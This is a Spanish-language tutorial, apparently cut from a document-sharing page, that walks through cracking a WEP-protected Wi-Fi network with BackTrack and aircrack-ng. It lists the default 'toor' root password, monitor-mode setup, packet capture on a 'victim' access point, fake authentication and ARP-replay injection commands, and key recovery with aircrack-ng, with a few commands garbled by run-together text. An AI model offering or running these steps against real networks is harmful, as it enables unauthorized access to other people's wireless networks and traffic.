A fuerza
Pass : toor
Luego cuando pida comando escriben startx
3 Una vez dentro buscamos en el "inicio" una aplicacion llamada konsole .
airmon-ng
airmon-ng start wlan0
airmon-ngairodump-ng mon0
Ctrl C para parar el scaneo
airodump-ng –w (guarda el archivo) redes –c (canal) --bssid (nombre de la red) mon0
Abrimos otra consola
aireplay-ng -1 0 –a 00:11:22:33:44:55(dirección mac víctima) mon0
Abrimos otra consola
aireplay-ng -3 –b 00:11:22:33:44:55 (dirección mac víctima) mon0
La consola donde vienen los paquetes debe de incrementarse hasta llegar a 30000.
Unavez que llegue a esa cantidad detenemos la consola con Ctrl C
Abrimos otra consola y utilizamos el comando dir. Buscamos el archivo redes- 01.cap
Utilizamos aircrack-ng redes -01.cap
La clave seencuentra guardada ahí.
Startx para iniciar backtrack
Primera consola
ifconfig
Guardar macadress y checar nombre de red
Segunda consola
airmon-ng start mon0
airodump-ng mon0
Ctrl C paradetener monitoreo
airodump-ng –c (canal) –bssid (mac victim) –w redes mon0
Tercera consola
aireplay-ng -1 6000 -o 1 –q 10 –e redes INFINITUM0000 –a 00:11:22:33:44:55 (mac adress víctima) mon0–h00:11:22:33:44:55 (mac adress nuestra)
-1 es el tipo de ataque (autenticación falsa)
6000 reautenticación cada 6000 segundos
-o variedad de paquetes, en este caso 1
-q manda aviso de que seguimosahí
-e nombre Access Point
-a indica la MAC del Access Point
-h macadress nuestra
Debe de aparecer un mensaje de Associate sucessful
Cuarta consola
aireplay-ng-3 –b 00:11:22:33:44:55 –h00:11:22:33:44:55 mon0
-3 inyecta paquetes ARP
-b indica la mac del AP
-h mi macadress
Quinta consola
aircrack-ng –z –b 00:11:22:33:44:55 redes-01.cap o tecla tab para autocompletar el nombre
Al ladode ASCII estará nuestra clave
4 Escribe ifconfig luego buscas tu interfaz de red que puede llamarse wlan0 , rausb , eth0 etc ... y buscas adonde dice hardware adress : anotas ese numero . ojo .....
Regístrate para leer el documento completo.